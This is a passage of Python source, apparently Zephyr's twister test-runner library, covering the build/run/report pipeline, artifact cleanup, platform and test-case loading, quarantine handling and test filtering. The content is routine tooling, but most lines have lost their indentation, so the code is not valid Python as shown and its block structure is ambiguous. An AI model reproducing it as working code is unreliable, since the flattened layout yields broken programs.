data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, pipeline, done, message, lock, results):
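        """Handle one pipeline message for this test instance.
        The 'op' field drives a small state machine:
        cmake -> build -> run -> report -> cleanup.
        """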
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
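        """Delete build artifacts, keeping only logs, zephyr/.config and any
        files listed in additional_keep.
        """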
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
            with open(file, "wt") as fout:
                fout.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
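        """Compare current footprint metrics against those saved in a CSV.
        Returns a list of (instance, metric, value, delta, lower_better)
        tuples for every metric that changed since the saved report.
        """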
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
        Loads the quarantine list from the given yaml file. Creates a dictionary
        of all test configurations (platform + scenario: comment) that shall be
        skipped due to quarantine.
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
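    # Illustrative sketch, assuming a hypothetical quarantine yaml entry: given
    #
    #   - scenarios: [kernel.common, sample.basic.helloworld]
    #     platforms: [qemu_x86]
    #     comment: "flaky on CI"
    #
    # load_quarantine() would fill self.quarantine with "<platform>.<scenario>" keys:
    #
    #   {"qemu_x86.kernel.common": "flaky on CI",
    #    "qemu_x86.sample.basic.helloworld": "flaky on CI"}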
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
            # When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
            self.verify_platforms_existence(platform_filter, "platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
self.verify_platforms_existence(
tc.integration_platforms, f"{tc_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
tc.platform_allow, f"{tc_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
                # run only quarantined tests to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
                for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
        # Remove from discards configurations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if instance.status not in ['passed', 'skipped', 'error']:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
# If the instance got 'error' status before, proceed to the report stage
if instance.status == "error":
pipeline.put({"op": "report", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
